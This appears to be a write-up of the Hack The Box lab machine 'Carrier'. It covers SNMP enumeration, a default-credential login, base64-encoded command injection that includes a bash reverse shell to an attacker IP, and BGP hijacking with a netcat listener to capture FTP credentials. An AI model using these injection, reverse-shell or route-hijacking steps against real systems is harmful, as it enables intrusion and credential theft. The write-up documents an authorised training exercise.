HTB Carrier Write-up

5 minute read

Carrier

Summary


Carrier is a nice, medium difficulty machine on hackthebox.eu featuring information retrieval via snmp, command injection and bgp hijacking. The bgp hijacking part was a nice learning experience as this is a technique you probably don’t see every day.

User Flag


We start by scanning the box with nmap and get the following ports:

nmap -Pn -sV -sC -p- -oA tcp_all 10.10.10.105
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
nmap -Pn -sV -sC -sU --top-ports=50 -oA udp50 10.10.10.105
161/udp   open   snmp            SNMPv1 server; pysnmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: pysnmp
|   engineIDFormat: octets
|   engineIDData: 77656201d7f908
|   snmpEngineBoots: 2
|_  snmpEngineTime: 5m30s

A quick snmpwalk (snmpwalk 10.10.10.105 -c public -v1) shows just one result, which looks like some sort of serial number:

iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"

The next thing to look at is the web application on port 80.

Carrier Login

As trying various default credentials yields no results we start looking for web content and find the following:

wfuzz --hc 404,403 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-words.txt http://carrier.htb/FUZZ
000015:  C=301      9 L       28 W      307 Ch    "js"
000021:  C=301      9 L       28 W      308 Ch    "css"
000060:  C=301      9 L       28 W      308 Ch    "img"
000169:  C=301      9 L       28 W      310 Ch    "tools"
000353:  C=301      9 L       28 W      308 Ch    "doc"
000408:  C=301      9 L       28 W      310 Ch    "fonts"
000688:  C=301      9 L       28 W      310 Ch    "debug"

Looking at the subdirectories in a web browser shows that they are listable! In “doc” we find a pdf manual of the system, in which it explains the status code we saw on the login page with “45009 - System credentials have not been set. Default admin user password is set (see chassis serial number)”. With this knowledge we go back to the login page and login with “admin:NET_45JDX23”, the password being the serial number we retrieved via snmp earlier.

Carrier Logged in

The “Diagnostics” menu lets us issue a post request to the server with the parameter check=cXVhZ2dh:

Carrier Logged in

After decoding the base64 with echo -ne "cXVhZ2dh" | base64 -d we get the string “quagga”. Playing a bit with the parameter we discover that it is possible to inject commands by simply appending them and encoding in base64 again:

echo -ne "quagga; whoami; id" | base64

check=cXVhZ2dhOyB3aG9hbWk7IGlk

<p>root</p><p>uid=0(root) gid=0(root) groups=0(root)</p>

To get a shell we use a basic bash one liner from cheats, encode and execute it, which leads to shell as root and reveals the user flag:

echo -ne 'quagga; /bin/bash -i >& /dev/tcp/10.10.14.14/5555 0>&1' | base64
cXVhZ2dhOyAvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQvNTU1NSAwPiYx

carrier user flag

Root Flag


Despite being root on the box we do not have any root flag yet so there has to be more to it. Going back to the webapp we can see several tickets which talk about several BGP related things, including this message:

...
Still reporting issues with 3 networks: 10.120.15,10.120.16,10.120.17/24's, one of their VIP is having issues connecting by FTP to an important server in the 10.120.15.0/24 network, investigating... 

What this is hinting at, is that we have several networks that use bgp to communicate and that there is potential clear text authentication being send over them with ftp. Looking at netstat confirms its bgp, as we have zebra and bgpd running:

tcp        0      0 127.0.0.1:2601          0.0.0.0:*               LISTEN      112        7806242     62602/zebra 
tcp        0      0 127.0.0.1:2605          0.0.0.0:*               LISTEN      112        7806244     62606/bgpd  
tcp        0      0 0.0.0.0:179             0.0.0.0:*               LISTEN      112        7805245     62606/bgpd  
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      0          44065       477/sshd    
tcp6       0      0 :::179                  :::*                    LISTEN      112        7805246     62606/bgpd  
tcp6       0      0 :::22                   :::*                    LISTEN      0          44070       477/sshd 

Now lets look at how zebra is configured in “/etc/quagga/bgpd.conf”:

route-map to-as200 permit 10
route-map to-as300 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0/21
 network 10.101.16.0/21
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
!
line vty
!

What we see here is that this machine is configured under the name “100” and is advertising the networks 10.101.8.0/21 and 10.101.16.0/21 as locally connected to its neighbors. In addition we see under which ip addresses we can reach the other routers.

Another important piece of information is in ip route, where we can see that some of the subnets are passed to “200” and some to “300”:

10.78.10.0/24 dev eth1  proto kernel  scope link  src 10.78.10.1
10.78.11.0/24 dev eth2  proto kernel  scope link  src 10.78.11.1
10.99.64.0/24 dev eth0  proto kernel  scope link  src 10.99.64.2
10.100.10.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.11.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.12.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.13.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.14.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.15.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.16.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.17.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.18.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.19.0/24 via 10.78.10.2 dev eth1  proto zebra
10.100.20.0/24 via 10.78.10.2 dev eth1  proto zebra
10.120.10.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.11.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.12.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.13.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.14.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.15.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.16.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.17.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.18.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.19.0/24 via 10.78.11.2 dev eth2  proto zebra
10.120.20.0/24 via 10.78.11.2 dev eth2  proto zebra

Having this information, in combination with the message from the webapp, leads to the following plan: Redirect traffic send from “200” to 10.120.15.0/24 in “300” through our router by advertising false routes. This technique is called bgp hijacking, an excellent guide can be found here.

In order to execute the attack we first modify bgpd.conf so that our router is now advertising the 10.120.15.0/25 network as directly connected:

vtysh
r1> en
r1# conf t
r1(config)# router bgp 100
r1(config-router)# network 10.120.15.0/25
r1(config-router)# end
r1# wr
r1# exit

The reason the target subnet is advertised as /25 instead of /24 is that more specific subnets are given priority in bgp routing. We could redirect the traffic the to original target, but since we are interested in ftp credentials an easy way is to pose as the target by adding its ip to the box we are on and starting a local listener on port 21:

ip a add 10.120.15.10/24 dev eth2
nc -lvp 21

After a moment we get a connection! To emulate a ftp server we have to respond manually with “331 Please specify the password.” to make the client send its authentication:

carrier ftp credentials

We can now use the credentials “root:BGPtelc0rout1ng” we obtained to log into the ftp server “10.120.15.10” (after removing the ip from our interface) where we find the root flag:

150 Here comes the directory listing.
-r--------    1 0        0              33 Jul 01 15:58 root.txt
-rw-------    1 0        0              33 Dec 27 12:11 secretdata.txt
...

Many thanks to snowscan for creating this fun box.

Updated: